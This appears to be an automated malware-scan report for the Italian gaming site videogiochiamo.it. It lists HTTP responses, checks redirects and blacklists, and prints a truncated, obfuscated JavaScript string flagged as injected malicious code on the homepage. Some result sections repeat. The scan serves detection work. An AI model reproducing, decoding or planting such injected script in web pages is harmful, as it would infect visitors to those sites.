Scanned pages/files
Request | Server response | Status |
http://videogiochiamo.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 06:39:24 GMT Location: http://www.videogiochiamo.it/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.videogiochiamo.it/ | 200 OK Content-Length: 74442 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var OOO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKwAzToQGbph2Qk5WZwBXYuwWMJpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWMJBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5icvRXYjNXdmJ2bs1Gdo5SawF2LvoDc0RHanASPgMmcz5CMw8kC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIwAzTgIXY2tzJFNTJ0BXayN2cvM0MlEEMlI0MlkjMlgjMlMXZjlmdyV2UsxWQlxmYh5WRlx2Zv92ZfN1RBBTJCNTJ5ITJyITJ2MzM3QTM5UTNzgT Antivirus reports:
| ||
http://srv.juiceadv.com/banner_ext.asp?User=3372&Tipo=13 | 200 OK Content-Length: 1784 Content-Type: text/html | clean |
http://srv.juiceadv.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://srv.juiceadv.com/banner_ext.asp?User=3372&Tipo=70 | 200 OK Content-Length: 1664 Content-Type: text/html | clean |
http://s10.histats.com/js9.js | 200 OK Content-Length: 7417 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3799 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: videogiochiamo.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 06:39:24 GMT
Location: http://www.videogiochiamo.it/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: videogiochiamo.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 06:39:24 GMT
Location: http://www.videogiochiamo.it/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: videogiochiamo.it
Referer: http://www.google.com/search?q=videogiochiamo.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: videogiochiamo.it
Referer: http://www.google.com/search?q=videogiochiamo.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=videogiochiamo.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://videogiochiamo.it/
Result: videogiochiamo.it is not infected or malware details are not published yet.
Result: videogiochiamo.it is not infected or malware details are not published yet.